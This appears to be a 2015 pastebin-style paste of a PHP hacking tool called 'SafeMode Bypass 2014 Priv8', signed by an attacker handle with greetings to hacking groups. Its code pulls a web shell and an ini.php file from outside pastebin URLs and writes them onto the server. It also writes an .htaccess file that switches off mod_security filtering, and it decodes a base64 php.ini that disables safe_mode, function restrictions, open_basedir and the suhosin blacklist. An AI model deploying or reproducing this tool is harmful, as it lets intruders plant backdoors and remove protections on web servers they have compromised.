Bypass Safe_Mod OFF 2014


SUBMITTED BY: Guest

DATE: Jan. 3, 2015, 7:38 a.m.

FORMAT: Text only

SIZE: 4.6 kB

HITS: 1335

  1. <link href='http://fonts.googleapis.com/css?family=Orbitron:700' rel='stylesheet' type='text/css'>
  2. <style type="text/css">
  3. body {
  4. background:
  5. url("http://i.imgur.com/hg21xZ9.png") repeat ,
  6. url("http://images3.alphacoders.com/142/142619.jpg") no-repeat center top,top left,top right;
  7. background-color: green;
  8. </style>
  9. <font face='Orbitron'>
  10. <?
  11. error_reporting(0);
  12. /*
  13. #######################################
  14. #SafeMode Bypass 2014 Priv8 #
  15. #Coded By Mauritania Attacker #
  16. #GreetZ To All AnonGhost MemberZ #
  17. #######################################
  18. */
  19. echo "<form method='POST'>
  20. <title>Bypass SafeMode 2014 Priv8</title>
  21. <center><pre><font color='green' face='Orbitron' size='6' face='Tahoma'>Bypass SafeMode 2014 Priv8</pre></font></center>
  22. <center><font color='red' size='2' face='shell'>Cwd</font><input type='text' size='40' name='zero' value=".dirname(__FILE__)." <font color='green' size='8' face='Tahoma'></font></center>
  23. <center><font color='red' size='2' face='shell'>Shell</font><input type='text' size='40' name='shell' value='http://pastebin.com/raw.php?i=2gmt5XFH' <font color='green' size='8' face='Tahoma'></font></center>
  24. <center><font color='red' size='2' face='shell'>ini.php</font><input type='text' size='40' name='rim' value='http://pastebin.com/raw.php?i=sEbXwVvt' <font color='green' size='8' face='Tahoma'></font></center>
  25. <p><center><input type='submit' value='Bypass SafeMode' name='start' <font color=red' face='Tahoma, Geneva, sans-serif' style='font-size: 12pt'><br></font></center></p>";
  26. echo "<p><center><textarea rows='12' cols='60' style='font-family: impact size: 2pt ; color: green; border: 1px dotted red'>Results Will Appear Here ^_^
  27. ";
  28. if($_POST['start']) {
  29. $zero = $_POST['zero'];
  30. $file = $_POST['shell'];
  31. $mauritania = $_POST['rim'];
  32. $htaccess = "<IfModule mod_security.c>
  33. SecFilterEngine Off
  34. SecFilterScanPOST Off
  35. SecFilterCheckURLEncoding Off
  36. SecFilterCheckCookieFormat Off
  37. SecFilterCheckUnicodeEncoding Off
  38. SecFilterNormalizeCookies Off
  39. </IfModule>
  40. <Limit GET POST>
  41. order deny,allow
  42. deny from all
  43. allow from all
  44. </Limit>
  45. <Limit PUT DELETE>
  46. order deny,allow
  47. deny from all
  48. </Limit>
  49. SetEnv PHPRC $zero/ghost/php.ini";
  50. $phpini = "c2FmZV9tb2RlID0gT0ZGDQpTYWZlX21vZGVfZ2lkID0gT0ZGDQpkaXNhYmxlX2Z1bmN0aW9ucyA9IE5P​​TkUNCmRpc2FibGVfY2xhc3NlcyA9IE5PTkUNCm9wZW5fYmFzZWRpciA9IE9GRg0Kc3Vob3Npbi5leGV​j​dXRvci5mdW5jLmJsYWNrbGlzdCA9IE5PTkU=";
  51. $dir = "ghost";
  52. if(file_exists($dir)) {
  53. echo "[+] ghost Folder Already Exist are you drunk :o xD !
  54. ";
  55. } else {
  56. @mkdir($dir); {
  57. echo "[+] ghost Folder Has Been Created Nygga :3 !
  58. ";
  59. } }
  60. # Generate Sh3LL
  61. $fopen = fopen("ghost/priv8.php5",'w');
  62. $shell = @file_get_contents($file);
  63. $swrite = fwrite($fopen ,$shell);
  64. if($swrite){
  65. echo "Shell Has Been Downloaded : $zero/ghost/priv8.php5
  66. ";
  67. } else {
  68. echo "Can't Download Shell :( do it manually :D
  69. ";
  70. }
  71. fclose($fopen);
  72. # Generate Htaccess
  73. $kolsv = fopen("ghost/.htaccess", "w");
  74. $hwrite = fwrite($kolsv, $htaccess);
  75. if($hwrite){
  76. echo ".htaccess Generated Successfully \!/
  77. ";
  78. } else {
  79. echo "Can't Generate Htaccess
  80. ";
  81. }
  82. fclose($kolsv);
  83. # Generate ini.php
  84. $xopen = fopen("ghost/ini.php",'w');
  85. $rim = @file_get_contents($mauritania);
  86. $zzz = fwrite($xopen ,$rim);
  87. if($zzz){
  88. echo "ini.php Has Been Downloaded \!/
  89. ";
  90. } else {
  91. echo "Can't Download ini.php :( do it manually :D
  92. ";
  93. }
  94. fclose($xopen);
  95. $ini = fopen("ghost/php.ini" ,"w");
  96. $php = fwrite($ini, base64_decode($phpini));
  97. if($php){
  98. echo "PHP.INI Generated Successfully \!/";
  99. } else {
  100. echo "[-] Can't Generate PHP.INI";
  101. }
  102. }
  103. echo "</textarea></center></p><pre></pre>";
  104. echo '<center><font color="#ee5500" size="3pt">Coded By Mauritania Attacker</font><br><font color="#ff8f00" size="1pt">GreetZ : AnonGhost - Teamp0ison - ZHC - Mauritania HaCker Team - 3xp1r3 Cyber Army - Robot Pirates - X-Blackerz INC. - Pak Cyber Pyrates - iMHATiMi.ORG</font></center>';
  105. ?>

comments powered by Disqus